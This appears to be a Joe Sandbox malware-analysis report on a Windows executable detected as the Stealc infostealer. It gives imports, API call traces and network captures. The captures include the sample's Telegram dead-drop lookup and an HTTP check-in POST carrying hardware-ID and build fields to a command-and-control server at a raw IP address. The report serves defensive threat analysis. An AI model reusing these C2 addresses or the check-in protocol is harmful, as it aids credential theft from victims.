RT_ICON	0x2612c8	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0, 256 important colors	0.5794797687861272
RT_ICON	0x261830	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0, 16 important colors	0.5080645161290323
RT_ICON	0x261b18	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0, 256 important colors	0.5446750902527075
RT_ICON	0x2623c0	0x668	Device independent bitmap graphic, 48 x 96 x 4, image size 0	0.3621951219512195
RT_ICON	0x262a28	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	0.4224413646055437
RT_GROUP_ICON	0x2638d0	0x5a	data	0.7333333333333333

Imports

DLL

Import

msvcrt.dll

strncpy, ??_V@YAXPAX@Z, memchr, ??_U@YAPAXI@Z, strtok, atexit, strtok_s, strcpy_s, vsprintf_s, memmove, strlen, malloc, free, memcmp, ??2@YAPAXI@Z, memset, memcpy, __CxxFrameHandler3

KERNEL32.dll

GetCurrentProcess, RaiseException, GetStringTypeW, MultiByteToWideChar, LCMapStringW, IsValidCodePage, GetOEMCP, lstrlenA, HeapAlloc, GetProcessHeap, VirtualProtect, WaitForSingleObject, CreateProcessA, lstrcatA, VirtualQueryEx, OpenProcess, ReadProcessMemory, WriteFile, GetACP, GetCPInfo, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, EncodePointer, DecodePointer, TerminateProcess, InitializeCriticalSectionAndSpinCount, LeaveCriticalSection, EnterCriticalSection, RtlUnwind, GetProcAddress, GetModuleHandleW, ExitProcess, Sleep, GetStdHandle, GetModuleFileNameW, GetLastError, LoadLibraryW, TlsGetValue, TlsSetValue, InterlockedIncrement, SetLastError, GetCurrentThreadId, InterlockedDecrement, WideCharToMultiByte

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-04T00:57:00.721287+0200	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.6	49716	193.233.112.44	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 4, 2024 00:56:56.250982046 CEST	49714	443	192.168.2.6	149.154.167.99
Oct 4, 2024 00:56:56.251017094 CEST	443	49714	149.154.167.99	192.168.2.6
Oct 4, 2024 00:56:56.251127958 CEST	49714	443	192.168.2.6	149.154.167.99
Oct 4, 2024 00:56:56.264940977 CEST	49714	443	192.168.2.6	149.154.167.99
Oct 4, 2024 00:56:56.264956951 CEST	443	49714	149.154.167.99	192.168.2.6
Oct 4, 2024 00:56:56.906230927 CEST	443	49714	149.154.167.99	192.168.2.6
Oct 4, 2024 00:56:56.907191992 CEST	49714	443	192.168.2.6	149.154.167.99
Oct 4, 2024 00:56:57.535132885 CEST	49714	443	192.168.2.6	149.154.167.99
Oct 4, 2024 00:56:57.535161018 CEST	443	49714	149.154.167.99	192.168.2.6
Oct 4, 2024 00:56:57.535439968 CEST	443	49714	149.154.167.99	192.168.2.6
Oct 4, 2024 00:56:57.535501003 CEST	49714	443	192.168.2.6	149.154.167.99
Oct 4, 2024 00:56:57.539289951 CEST	49714	443	192.168.2.6	149.154.167.99
Oct 4, 2024 00:56:57.579402924 CEST	443	49714	149.154.167.99	192.168.2.6
Oct 4, 2024 00:56:57.726885080 CEST	443	49714	149.154.167.99	192.168.2.6
Oct 4, 2024 00:56:57.726902008 CEST	443	49714	149.154.167.99	192.168.2.6
Oct 4, 2024 00:56:57.726941109 CEST	443	49714	149.154.167.99	192.168.2.6
Oct 4, 2024 00:56:57.726955891 CEST	443	49714	149.154.167.99	192.168.2.6
Oct 4, 2024 00:56:57.726963043 CEST	49714	443	192.168.2.6	149.154.167.99
Oct 4, 2024 00:56:57.726999044 CEST	49714	443	192.168.2.6	149.154.167.99
Oct 4, 2024 00:56:57.727049112 CEST	49714	443	192.168.2.6	149.154.167.99
Oct 4, 2024 00:56:57.736054897 CEST	49714	443	192.168.2.6	149.154.167.99
Oct 4, 2024 00:56:57.736068964 CEST	443	49714	149.154.167.99	192.168.2.6
Oct 4, 2024 00:56:57.754158020 CEST	49715	80	192.168.2.6	91.214.78.145
Oct 4, 2024 00:56:57.759234905 CEST	80	49715	91.214.78.145	192.168.2.6
Oct 4, 2024 00:56:57.759413958 CEST	49715	80	192.168.2.6	91.214.78.145
Oct 4, 2024 00:56:57.759588003 CEST	49715	80	192.168.2.6	91.214.78.145
Oct 4, 2024 00:56:57.764365911 CEST	80	49715	91.214.78.145	192.168.2.6
Oct 4, 2024 00:56:59.464976072 CEST	80	49715	91.214.78.145	192.168.2.6
Oct 4, 2024 00:56:59.465089083 CEST	49715	80	192.168.2.6	91.214.78.145
Oct 4, 2024 00:56:59.465727091 CEST	49715	80	192.168.2.6	91.214.78.145
Oct 4, 2024 00:56:59.470124006 CEST	49716	80	192.168.2.6	193.233.112.44
Oct 4, 2024 00:56:59.471800089 CEST	80	49715	91.214.78.145	192.168.2.6
Oct 4, 2024 00:56:59.476260900 CEST	80	49716	193.233.112.44	192.168.2.6
Oct 4, 2024 00:56:59.476358891 CEST	49716	80	192.168.2.6	193.233.112.44
Oct 4, 2024 00:56:59.476568937 CEST	49716	80	192.168.2.6	193.233.112.44
Oct 4, 2024 00:56:59.482949018 CEST	80	49716	193.233.112.44	192.168.2.6
Oct 4, 2024 00:57:00.305043936 CEST	80	49716	193.233.112.44	192.168.2.6
Oct 4, 2024 00:57:00.305114985 CEST	49716	80	192.168.2.6	193.233.112.44
Oct 4, 2024 00:57:00.328989029 CEST	49716	80	192.168.2.6	193.233.112.44
Oct 4, 2024 00:57:00.335839987 CEST	80	49716	193.233.112.44	192.168.2.6
Oct 4, 2024 00:57:00.721211910 CEST	80	49716	193.233.112.44	192.168.2.6
Oct 4, 2024 00:57:00.721287012 CEST	49716	80	192.168.2.6	193.233.112.44
Oct 4, 2024 00:57:01.832484961 CEST	49716	80	192.168.2.6	193.233.112.44

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 4, 2024 00:56:56.237881899 CEST	60700	53	192.168.2.6	1.1.1.1
Oct 4, 2024 00:56:56.246144056 CEST	53	60700	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 4, 2024 00:56:56.237881899 CEST	192.168.2.6	1.1.1.1	0x675d	Standard query (0)	t.me	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 4, 2024 00:56:56.246144056 CEST	1.1.1.1	192.168.2.6	0x675d	No error (0)	t.me		149.154.167.99	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

t.me

91.214.78.145

193.233.112.44

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49715	91.214.78.145	80	6936	C:\Users\user\Desktop\BnxBRWQWhy.exe

Timestamp	Bytes transferred	Direction	Data
Oct 4, 2024 00:56:57.759588003 CEST	88	OUT	GET / HTTP/1.1 Host: 91.214.78.145 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49716	193.233.112.44	80	6936	C:\Users\user\Desktop\BnxBRWQWhy.exe

Timestamp	Bytes transferred	Direction	Data
Oct 4, 2024 00:56:59.476568937 CEST	89	OUT	GET / HTTP/1.1 Host: 193.233.112.44 Connection: Keep-Alive Cache-Control: no-cache
Oct 4, 2024 00:57:00.305043936 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 03 Oct 2024 22:57:00 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Oct 4, 2024 00:57:00.328989029 CEST	412	OUT	POST /383ccd496f3c5eee.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CGDGCFBAEGDHJKEBGCBA Host: 193.233.112.44 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 43 47 44 47 43 46 42 41 45 47 44 48 4a 4b 45 42 47 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 36 31 36 34 43 46 37 31 45 34 43 32 38 31 37 30 31 38 37 30 38 0d 0a 2d 2d 2d 2d 2d 2d 43 47 44 47 43 46 42 41 45 47 44 48 4a 4b 45 42 47 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 6f 66 74 0d 0a 2d 2d 2d 2d 2d 2d 43 47 44 47 43 46 42 41 45 47 44 48 4a 4b 45 42 47 43 42 41 2d 2d 0d 0a Data Ascii: ------CGDGCFBAEGDHJKEBGCBAContent-Disposition: form-data; name="hwid"86164CF71E4C2817018708------CGDGCFBAEGDHJKEBGCBAContent-Disposition: form-data; name="build"soft------CGDGCFBAEGDHJKEBGCBA--
Oct 4, 2024 00:57:00.721211910 CEST	178	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 03 Oct 2024 22:57:00 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 8 Connection: keep-alive Data Raw: 59 6d 78 76 59 32 73 3d Data Ascii: YmxvY2s=

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49714	149.154.167.99	443	6936	C:\Users\user\Desktop\BnxBRWQWhy.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 22:56:57 UTC	91	OUT	GET /hwlflcqshvwp HTTP/1.1 Host: t.me Connection: Keep-Alive Cache-Control: no-cache
2024-10-03 22:56:57 UTC	511	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Thu, 03 Oct 2024 22:56:57 GMT Content-Type: text/html; charset=utf-8 Content-Length: 12415 Connection: close Set-Cookie: stel_ssid=76118ed14c179f4c2c_1390940431536211434; expires=Fri, 04 Oct 2024 22:56:57 GMT; path=/; samesite=None; secure; HttpOnly Pragma: no-cache Cache-control: no-store X-Frame-Options: ALLOW-FROM https://web.telegram.org Content-Security-Policy: frame-ancestors https://web.telegram.org Strict-Transport-Security: max-age=35768000
2024-10-03 22:56:57 UTC	12415	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 68 77 6c 66 6c 63 71 73 68 76 77 70 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @hwlflcqshvwp</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.

Target ID:	0
Start time:	18:56:54
Start date:	03/10/2024
Path:	C:\Users\user\Desktop\BnxBRWQWhy.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\BnxBRWQWhy.exe"
Imagebase:	0x730000
File size:	336'040 bytes
MD5 hash:	EA6989E3A607D753377B05BAE55140D8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000000.2106325851.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2158782310.0000000000FBE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	13%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	9.8%
Total number of Nodes:	2000
Total number of Limit Nodes:	26

Executed Functions

Function 007345C0 Relevance: 112.1, APIs: 34, Strings: 30, Instructions: 114
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,007469FB), ref: 007345CC
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,007469FB), ref: 007345D7
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,007469FB), ref: 007345E2
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,007469FB), ref: 007345ED
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,007469FB), ref: 007345F8
GetProcessHeap.KERNEL32(00000000,?,?,0000000F,?,007469FB), ref: 00734607
RtlAllocateHeap.NTDLL(00000000,?,0000000F,?,007469FB), ref: 0073460E
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,007469FB), ref: 0073461C
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,007469FB), ref: 00734627
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,007469FB), ref: 00734632
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,007469FB), ref: 0073463D
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,007469FB), ref: 00734648
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,007469FB), ref: 0073465C
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,007469FB), ref: 00734667
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,007469FB), ref: 00734672
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,007469FB), ref: 0073467D
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,007469FB), ref: 00734688
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 007346B1
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 007346BC
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 007346C7
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 007346D2
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 007346DD
strlen.MSVCRT ref: 007346F0
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00734718
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00734723
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0073472E
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00734739
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00734744
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00734754
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0073475F
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0073476A
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00734775
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00734780
VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0073479C

Strings

The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00734622
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00734678
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007346AC
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0073471E
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00734765
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0073477B
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00734617
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00734638
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007346CD
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00734657
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007346B7
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007345E8
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0073475A
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00734643
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00734713
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00734683
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007346C2
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0073474F
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007345C7
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007345D2
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007345F3
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00734734
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0073466D
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007346D8
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007345DD
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00734662
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00734770
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00734729
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0073473F
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0073462D

Memory Dump Source

Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd

Yara matches

Similarity

API ID: lstrlen$Heap$AllocateProcessProtectVirtualstrlen
String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
API String ID: 2127927946-2218711628
Opcode ID: a0cea679af5976d908c0900f6283294c39538746475e892664c668552f6b5400
Instruction ID: 6bf1d1b796161a3ae56b3c09243b2e57810d7610e3b3fab1c0242dae6edb3c9d
Opcode Fuzzy Hash: a0cea679af5976d908c0900f6283294c39538746475e892664c668552f6b5400
Instruction Fuzzy Hash: 534112B9640644EBC7189FE4EC9D99CBB70BB4A723B60C082F922851B0D7FD9505DB39

Function 00749860 Relevance: 61.5, APIs: 33, Strings: 2, Instructions: 212
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(76210000,00FC2CB0), ref: 007498A1
GetProcAddress.KERNEL32(76210000,00FC2DA0), ref: 007498BA
GetProcAddress.KERNEL32(76210000,00FC2B78), ref: 007498D2
GetProcAddress.KERNEL32(76210000,00FC2DE8), ref: 007498EA
GetProcAddress.KERNEL32(76210000,00FC2D28), ref: 00749903
GetProcAddress.KERNEL32(76210000,00FC1538), ref: 0074991B
GetProcAddress.KERNEL32(76210000,00FBAC68), ref: 00749933
GetProcAddress.KERNEL32(76210000,00FBACE8), ref: 0074994C
